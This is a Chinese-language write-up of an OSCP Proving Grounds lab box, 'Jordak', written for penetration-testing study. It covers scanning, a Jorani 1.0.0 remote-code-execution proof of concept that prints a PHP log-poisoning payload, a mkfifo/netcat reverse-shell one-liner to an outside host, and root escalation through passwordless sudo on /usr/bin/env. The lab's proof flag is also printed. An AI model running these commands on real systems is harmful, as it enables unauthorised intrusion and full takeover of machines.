OSCP - Proving Grounds - Jordak

主要知识点

  • /usr/bin/env提权

具体步骤

执行nmap扫描

复制代码
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-27 19:54 China Standard Time
Nmap scan report for 192.168.221.109
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_  256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现80端口开放,但看不到任何内容,所以dirb一下,发现了很多路径开放,也有很多潜在的线索

复制代码
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.221.109
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                C:\Users\Administrator\Documents\tools\SecLists-2024.3\SecLists-2024.3\Discovery\Web-Content\quickhits.txt
[+] Negative Status codes:   307,400,403,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.gitattributes       (Status: 200) [Size: 505]
/.gitignore           (Status: 200) [Size: 477]
/composer.json        (Status: 200) [Size: 973]
/composer.lock        (Status: 200) [Size: 91293]
/docker-compose.yml   (Status: 200) [Size: 499]
/Dockerfile           (Status: 200) [Size: 879]
/phpunit.xml          (Status: 200) [Size: 465]
/README.md            (Status: 200) [Size: 4958]
/sonar-project.properties (Status: 200) [Size: 336]
/sql/                 (Status: 200) [Size: 2898]
/tests                (Status: 301) [Size: 318] [--> http://192.168.221.109/tests/]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

最终发现一个登录页面,是Jorani v1.0.0,

搜索一下相应的vulnerability信息,发现了

Jorani 1.0.0 - Remote Code Execution (CVE-2023-26469) - Vulnerability & Exploit Database

按照其中描述的exp,在本地执行

复制代码
PS C:\Users\Administrator\Documents\OFFSEC\Practice\GoToWork\Jordak> python .\CVE_Jorani.py http://192.168.221.109

        /!\ Do not use this if you are not authorized to /!\

[?] POC made by @jrjgjk (Guilhem RIOUX)

[?] Header used for exploit: FNUAWCDCVYLM
[?] Requesting session cookie
[?] Poisonning log file with payload: '<?php if(isset($_SERVER['HTTP_FNUAWCDCVYLM'])){system(base64_decode($_SERVER['HTTP_FNUAWCDCVYLM']));} ?>'
[?] Set path traversal to '../../application/logs'
[+] Recoveredd CSRF Token: 8d68027d90188dcbad14f3ad9ccaf80e
[?] Accessing log file: log-2024-10-27
jrjgjk@jorani(PSEUDO-TERM)
$ id

uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)

jrjgjk@jorani(PSEUDO-TERM)
$ rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.192 80 >/tmp/f

但是exp自带的命令行并不是一个真正的shell,于是我们需要建立一个reverse shell先,发现 jordak属于sudo组,并且可以不需要密码执行/usr/bin/env

复制代码
jordak@jordak:/home/jordak$ id
id
uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)
jordak@jordak:/home/jordak$ sudo -l
sudo -l
Matching Defaults entries for jordak on jordak:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jordak may run the following commands on jordak:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /usr/bin/env

搜索一下GTFObings,得到 /usr/bin/env可以使用如下方式提权

提权成功

复制代码
sudo /usr/bin/env /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
47f2032a288a0d113c92c07df6a9ad18
相关推荐
通信瓦工7 分钟前
IEC 60598-1-2020灯具通用安全要求标准介绍
安全·灯具·标准下载
浅拾光º13 分钟前
mysql字符串截取,如何在MySQL备份文件中安全截取敏感字符串?
数据库·mysql·安全
踏过山河,踏过海15 分钟前
在SSL证书是有效的前提下,依旧显示“资源不安全
网络协议·安全·ssl
游戏开发爱好者82 小时前
App HTTPS 抓包实战,原理、常见问题与可行工具路线(开发 测试 安全 角度)
网络协议·安全·ios·小程序·https·uni-app·iphone
Teamhelper_AR3 小时前
AR技术:轨道交通运维与安全保障的革新力量
运维·安全·ar
JoyCong19983 小时前
远程安全提示再升级!隐私屏开启位置突出、可录入被控锁屏...
服务器·网络·安全
zezexihaha3 小时前
AI 时代的安全防线:国产大模型的数据风险与治理路径
人工智能·安全
纠结的学渣3 小时前
信息安全基础知识:05物理与环境安全
网络·安全
舒一笑3 小时前
TorchV知识库安全解决方案:基于智能环境感知的动态权限控制
后端·安全·掘金技术征文
峥嵘life4 小时前
Android16 应用代码新特性
java·开发语言·学习·安全